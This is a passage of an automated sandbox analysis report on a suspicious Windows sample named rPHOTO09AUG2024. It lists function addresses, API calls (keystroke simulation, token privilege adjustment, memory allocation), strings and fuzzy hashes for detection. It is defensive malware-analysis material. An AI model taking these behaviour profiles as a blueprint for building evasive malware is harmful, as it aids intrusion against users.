Opcode ID: ee2d12a1183e37c4f2a7ef6b6b453bb12f797abba31c30dea3d10c2f7f9d231f
Instruction ID: 16fefec16056fc0538c375f744e3ca7788c2e5a3d7b16980c627c94001df1e33
Opcode Fuzzy Hash: ee2d12a1183e37c4f2a7ef6b6b453bb12f797abba31c30dea3d10c2f7f9d231f
Instruction Fuzzy Hash: E041F774608351CFDB14DF18C484B1ABBE1BF45314F1988ACE8998B762C335EC45CB62

Function 00D4C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00D4C73D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: a95dc93e1f741988f7e607c0849bb33cd4a45bc45633b794d8ad69f8094494c9
Instruction ID: 86aa211dafd70ed6ff5c73edceb99e49f97a34d618e2481345c15665403679e5
Opcode Fuzzy Hash: a95dc93e1f741988f7e607c0849bb33cd4a45bc45633b794d8ad69f8094494c9
Instruction Fuzzy Hash: 68119071911219DBCB14ABA9DC819EEF778EF51350F144126E851A7190EB30AD0ACBB0

Function 00D44F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D44D13: FreeLibrary.KERNEL32(00000000,?), ref: 00D44D4D

Part of subcall function 00D6548B: __wfsopen.LIBCMT ref: 00D65496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44F6F

Part of subcall function 00D44CC8: FreeLibrary.KERNEL32(00000000), ref: 00D44D02

Part of subcall function 00D44DD0: _memmove.LIBCMT ref: 00D44E1A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 35446923b812ac2e4c16c371f8b6ad198094724f2b992d56a5e2f67ce91f1c06
Instruction ID: a9b9888481f0e9a20b85d64a99a123bf40771da7b8d23e320c65909cc7899ebe
Opcode Fuzzy Hash: 35446923b812ac2e4c16c371f8b6ad198094724f2b992d56a5e2f67ce91f1c06
Instruction Fuzzy Hash: 2711E731600706ABCB10AF70DC52FAEB7A5DF80701F108429F581A62C1DF719A459B70

Function 00D801AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00D801BB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7987fefac42a534bb2db70556c0325148671eb8ef1851ac009a03e7643839e9d
Instruction ID: efc35c8b89f06f1231086573f0b08d805b59c5a8a7c3495973280e33645202ab
Opcode Fuzzy Hash: 7987fefac42a534bb2db70556c0325148671eb8ef1851ac009a03e7643839e9d
Instruction Fuzzy Hash: 1E2113B4648341DFCB14DF18C445B1ABBE1BF84314F098968F89A57761D731E849CBA2

Function 00D60941 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D609F4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 15006c996125852c6e519009fb0208a27808ab84b6e3733ac477c488a71a87b2
Instruction ID: 62da20a4d86c422da554a3387fb033a7087662726408e70ef3ff16804d2dfd71
Opcode Fuzzy Hash: 15006c996125852c6e519009fb0208a27808ab84b6e3733ac477c488a71a87b2
Instruction Fuzzy Hash: A801843904A2808FCB13DB60D8DA7C17F71DF4722432A42DED8858B876CA67441EDF61

Function 00D4C6DA Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00D4C73D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 06dbe9712973824005c73b368bdc59ae9e49e4afb71c97e172634948b15e0bad
Instruction ID: f1dd7057a4b9264d28cd797592b4e3b4075a3202eac1a02550216879195f21ca
Opcode Fuzzy Hash: 06dbe9712973824005c73b368bdc59ae9e49e4afb71c97e172634948b15e0bad
Instruction Fuzzy Hash: 2B01D232D053459FEB155F68C8806AEFB74EF56360F1940ABD950EB2A2D7309C06CBB4

Function 00D64A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00D64AD6

Part of subcall function 00D68D68: __getptd_noexit.LIBCMT ref: 00D68D68

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 5bafd0917429e814ba89cfc5fa9a691a07975bc2c9ebdd4b4599d6c767269c00
Instruction ID: a27c3d6d96d5aabfe5717e4b21895f508151ff2fd7f779aff085789c799fc491
Opcode Fuzzy Hash: 5bafd0917429e814ba89cfc5fa9a691a07975bc2c9ebdd4b4599d6c767269c00
Instruction Fuzzy Hash: 63F0C831980209ABDF51AFB4CC0639F3661EF00329F088614F4149B1D1CB78C950DF75

Function 00D44FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00E062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44FDE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 70e16ef180cd7ac1322a606744a62b2ad9320f769b1ae3e221d8e9148eed622c
Instruction ID: fb0bbfc23c2ea569db7ab3f8deb3355637c5b9a254a7b8121f2260c7141b8281
Opcode Fuzzy Hash: 70e16ef180cd7ac1322a606744a62b2ad9320f769b1ae3e221d8e9148eed622c
Instruction Fuzzy Hash: A3F039B1105752CFCB349F64E494912BBE1BF043293288A3EE5D782610C731A888DF60

Function 00D609D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D609F4

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 635ed003cdfb43fa29ef220d9287231dcf95786fd5c337ac4eb1ac1c8c7780fc
Instruction ID: d85854a2e1d6238a5458d7b3932f5fc78a6f20a2e368c300c4da24aaed9b212f
Opcode Fuzzy Hash: 635ed003cdfb43fa29ef220d9287231dcf95786fd5c337ac4eb1ac1c8c7780fc
Instruction Fuzzy Hash: 0AE0863690422997C720D6589C05FFAB7ADDF89690F0441B5FC0CD7204EA609C8186B0

Function 00DA9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00DA914B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: d5e25202d353e117d07dd21c304321e47e390360461c74255bf91e01e3d8c53e
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 26E092B0104B005FD7348A24D8107E3B3E0EB06315F04081CF29A83341EB6278418769

Function 00D6548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00D65496

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 4567ec1b6402bde0016093e37f570fd3bf998b8ee629e5c9e3cc6811620ac3e5
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: DAB0927684020C77DE012E82FC02A593B199B40678F808060FB0C18166EA73A6A096A9

Function 00D60E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00D60EF7

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 34de4981330721d83b6f48b9a9e6c782b7f7156b5e70b95da44df4af4fbdf655
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8E31D671A00115DFC718DF58D48096AFBB6FF59300B688AA5E44ACB652D732EDC1CBE0

Function 010822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 010822B1

Memory Dump Source

Source File: 00000000.00000002.2174293223.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1080000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e2e1bde34585465c5d4cb2ee7b592f694c39711734bf98120f69c374169e308d
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 9CE0BF7494410EAFDB00EFA4D54969E7BB4EF04301F100161FD0192281D63099508A62

Non-executed Functions

Function 00DCCDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DCCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DCCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCCF00
SendMessageW.USER32 ref: 00DCCF29
_wcsncpy.LIBCMT ref: 00DCCFA1
GetKeyState.USER32(00000011), ref: 00DCCFC2
GetKeyState.USER32(00000009), ref: 00DCCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DCCFE5
GetKeyState.USER32(00000010), ref: 00DCCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DCD018
SendMessageW.USER32 ref: 00DCD03F
SendMessageW.USER32(?,00001030,?,00DCB602), ref: 00DCD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DCD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DCD16E
SetCapture.USER32(?), ref: 00DCD177
ClientToScreen.USER32(?,?), ref: 00DCD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DCD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DCD203
ReleaseCapture.USER32 ref: 00DCD20E
GetCursorPos.USER32(?), ref: 00DCD248
ScreenToClient.USER32(?,?), ref: 00DCD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCD2B1
SendMessageW.USER32 ref: 00DCD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD31C
SendMessageW.USER32 ref: 00DCD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DCD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DCD37B
GetCursorPos.USER32(?), ref: 00DCD39B
ScreenToClient.USER32(?,?), ref: 00DCD3A8
GetParent.USER32(?), ref: 00DCD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DCD431
SendMessageW.USER32 ref: 00DCD462
ClientToScreen.USER32(?,?), ref: 00DCD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DCD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DCD51A
SendMessageW.USER32 ref: 00DCD53D
ClientToScreen.USER32(?,?), ref: 00DCD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DCD5C3

Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC

GetWindowLongW.USER32(?,000000F0), ref: 00DCD65F

Strings

F, xrefs: 00DCD543
pr, xrefs: 00DCD1BD
@GUI_DRAGID, xrefs: 00DCD1AA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pr
API String ID: 3977979337-1436871235
Opcode ID: a3a7c4383fdfea9d04968752cddc06d87d4c6a60a90c4655917443f5875ecf2a
Instruction ID: 1d074740777a676d0a0f5be3906b632f57d40468d4bd6e9ad5a9561ac517e801
Opcode Fuzzy Hash: a3a7c4383fdfea9d04968752cddc06d87d4c6a60a90c4655917443f5875ecf2a
Instruction Fuzzy Hash: EC425B70114342AFD725CF68C844FAABBEAEF49314F18462DF699972A1C7319854CBB2

Function 00DC804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DC873F

Strings

%d/%02d/%02d, xrefs: 00DC8478

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 20efa5c20f8b0886eafa84962a2ac0b2c11432421477eba9b5ec106300a37e4a
Instruction ID: f13a7daab4248d9465763715d6c7891d88fe6128c3052d8ec27a7c124ed605b4
Opcode Fuzzy Hash: 20efa5c20f8b0886eafa84962a2ac0b2c11432421477eba9b5ec106300a37e4a
Instruction Fuzzy Hash: 9B12AE71540346ABEB258F24CC49FAA7BB9EF89710F24412DF915EB2E1EB709941DB30

Function 00D5710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D575C2
_memset.LIBCMT ref: 00D576B1
_memmove.LIBCMT ref: 00D57C4B
_memmove.LIBCMT ref: 00D57E4F

Strings

[:>:]], xrefs: 00D5760A
\b(?=\w), xrefs: 00D93C34
\b(?<=\w), xrefs: 00D93C41
DEFINE, xrefs: 00D925AF
[:<:]], xrefs: 00D575F1
Q\E, xrefs: 00D581C1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: d176f72a41a6e39f8e690d78f5f98b1836cdae29e1eb210582bc7108462335da
Instruction ID: ef8c62947a08d6c136a06d079d0e533190149d0c4a866cab70e03625d8f3f3d1
Opcode Fuzzy Hash: d176f72a41a6e39f8e690d78f5f98b1836cdae29e1eb210582bc7108462335da
Instruction Fuzzy Hash: E4938275A04215DBDF24CF98D881BBDB7B1FF48310F29816AE955EB281E7709E81CB60

Function 00D44A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00D44A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D7DA8E
IsIconic.USER32(?), ref: 00D7DA97
ShowWindow.USER32(?,00000009), ref: 00D7DAA4
SetForegroundWindow.USER32(?), ref: 00D7DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D7DAC4
GetCurrentThreadId.KERNEL32 ref: 00D7DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00D7DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00D7DAF8
SetForegroundWindow.USER32(?), ref: 00D7DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7DB10
keybd_event.USER32(00000012,00000000), ref: 00D7DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7DB25
keybd_event.USER32(00000012,00000000), ref: 00D7DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7DB33
keybd_event.USER32(00000012,00000000), ref: 00D7DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D7DB42
keybd_event.USER32(00000012,00000000), ref: 00D7DB47
SetForegroundWindow.USER32(?), ref: 00D7DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00D7DB71

Strings

Shell_TrayWnd, xrefs: 00D7DA89

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 33c6567a79d9ce89ad0ccf593c71e70fd629a4ba52b3eb8471fe019ec572e689
Instruction ID: 1c6d5e148f9626af9f3fde89391dda19499df5b6646294b6bc6e6dd4db79deb9
Opcode Fuzzy Hash: 33c6567a79d9ce89ad0ccf593c71e70fd629a4ba52b3eb8471fe019ec572e689
Instruction Fuzzy Hash: 54315371A80319BFEB216FA19C49FBE3E7DEF44B50F154025FA04E62D0D6B05910AAB0

Function 00D98858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00D98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D98D0D
Part of subcall function 00D98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D98D3A
Part of subcall function 00D98CC3: GetLastError.KERNEL32 ref: 00D98D47

_memset.LIBCMT ref: 00D9889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D988ED
CloseHandle.KERNEL32(?), ref: 00D988FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D98915
GetProcessWindowStation.USER32 ref: 00D9892E
SetProcessWindowStation.USER32(00000000), ref: 00D98938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D98952

Part of subcall function 00D98713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D98851), ref: 00D98728
Part of subcall function 00D98713: CloseHandle.KERNEL32(?,?,00D98851), ref: 00D9873A

Strings

winsta0, xrefs: 00D98910
, xrefs: 00D988AA
default, xrefs: 00D9894D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

